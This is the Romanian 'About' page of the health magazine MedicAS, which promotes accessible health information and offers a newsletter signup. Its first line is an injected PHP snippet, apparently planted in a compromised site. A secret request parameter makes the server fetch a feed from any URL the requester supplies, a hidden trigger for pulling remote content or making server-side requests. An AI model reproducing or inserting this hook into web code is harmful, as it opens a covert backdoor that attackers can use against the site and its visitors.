isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Despre MedicAS - revista medicala MedicAS

011.jpg

MedicAS - asul în medicină

Ne dorim să arătăm bine. Ce înseamnă asta? Să fim sănătoşi.
Ne dorim să fim fericiţi, plini de viaţă, plini de energie. Ce înseamnă asta? Să fim sănătoşi.

Tot ce e mai bun în viaţă se reduce la sănătate. Gândeşte-te ce bine e să te trezeşti cu poftă de viaţă în fiecare dimineaţă, să te simţi puternic(ă), să străluceşti de frumuseţe şi să fii bine dispus(ă) mereu. Pentru a avea toate aceste lucruri, este important să ai grijă de sănătatea ta.

Revista MedicAS îşi propune să trateze teme de sănătate pe înţelesul tuturor. Ne dorim să acoperim arii cât mai extinse: de la medicină alopată la cea naturistă şi terapiile alternative. Vom vorbi cu doctori, cu specialişti în cosmetica şi cu antrenori de fitness sau gimnastică recuperatorie, pentru a obţine cele mai interesante informaţii pentru dumneavoastră.

Noi, echipa MedicAS, am identificat o nevoie: cea de informare şi de educare în domeniul medicinei. Este important să avem mai multă grijă de noi, să ne respectăm şi să ne punem sănătatea pe primul plan, mereu. Acesta este lucrul pentru care pledează MedicAS.

Vă dorim să trăiţi fiecare zi cu maximum de intensitate şi să aveţi o sănătate de fier. V-o puteţi menţine cu ajutorul MedicAS!

 
 

Newsletter

Loading... Loading...